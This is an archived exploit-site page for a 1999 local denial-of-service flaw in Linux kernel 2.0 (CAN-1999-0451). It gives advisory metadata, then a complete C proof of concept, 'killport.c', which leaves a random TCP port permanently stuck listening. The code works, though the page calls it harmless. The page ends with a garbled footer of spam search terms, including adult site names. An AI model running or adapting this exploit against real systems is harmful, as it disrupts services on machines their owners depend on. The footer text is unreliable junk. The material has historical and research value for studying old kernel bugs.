about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Linux TCP Port DoS Vulnerability


Title Linux TCP Port DoS Vulnerability
Published 1999-01-19-12:00AM
Updated 1999-06-01-12:00AM
Class Unknown
CVE   CAN-1999-0451
Remote  No
Local  Yes
Credit  First posted to BugTraq by David Schwartz <davids@WEBMASTER.COM> on January 19, 1999.
Vulnerable  Linux kernel 2.0
Not Vulnerable  Linux kernel 2.2
Linux kernel 2.1
Code   Below is a harmless example of the exploit:

// This program will kill a random port on a linux machine. The kernel will

// forever listen to that port and send the connections nowhere. Tested with

// Linux kernel 2.0.35 and libc-2.0.7. Requires LinuxThreads to compile,

// but removing LinuxThreads from your system will not solve the problem.

// Discovered by David J. Schwartz <davids@webmaster.com>

// Copyright (C) 1998, David J. Schwartz

// Compile with:

// gcc killport.c -lpthread -o killport

#include <pthread.h>

#include <stdio.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <stdlib.h>

#include <arpa/inet.h>

#include <errno.h>

volatile int s;

void *Thread1(void *a)

{

int i,p;

struct sockaddr_in to;

fd_set fd;

s=socket(AF_INET, SOCK_STREAM, 0);

if(s<=0) return;

memset(&to, 0, sizeof(to));

srand(getpid());

/* we pick a random port between 50000 and 59999 */

p=(rand()%10000)+50000;

printf("port = %d ", p);

fflush(stdout);

to.sin_port=htons(p);

to.sin_addr.s_addr=0;

to.sin_family=AF_INET;

if(bind(s, (struct sockaddr *)&to, sizeof(to))<0) fprintf(stderr,"no bind ");

if(listen(s,10)!=0)

fprintf(stderr,"No Listen ");

/* now we are listening on that port */

i=sizeof(to);

FD_ZERO(&fd);

FD_SET(s,&fd);

select(s+1,&fd,NULL,NULL,NULL);

/* at this point we have selected on it as well */

fprintf(stderr,"select returned! ");

}

void *Thread2(void *a)

{

close(s);

fflush(stderr);

abort();

}

void main(void)

{

pthread_t j;

pthread_create(&j,NULL,Thread1,NULL);

usleep(100); /* give the other thread time to finish */

pthread_create(&j,NULL,Thread2,NULL);

while(1) sleep(1);

}
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 00:00:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
shopadmin. www.fox@se news for c www.jn001. news for c freefhqiig www sex 18 www.dakao8 sex -sexse newsletter WWW.SEX.VE Searching www.dakao8 uncensored hot girls Www.pamell Invision P Www.momich www.rgtu.n Indian gir joomla 1.0 200 /compo www.579151 Phpnuke Www.feesex mambo Remo Xxl sex tv Macromedia www.atashb sexv. namitha fi videos man yueduwenzh WwwVirtual seka putty.exe Saved porn owl news for c Linux Kern meirong.wy Www.axoax. www 3pik.c wwww89com Xix worldsex.c ww,xnx,com www.798shu Tagger LE. aubrey mil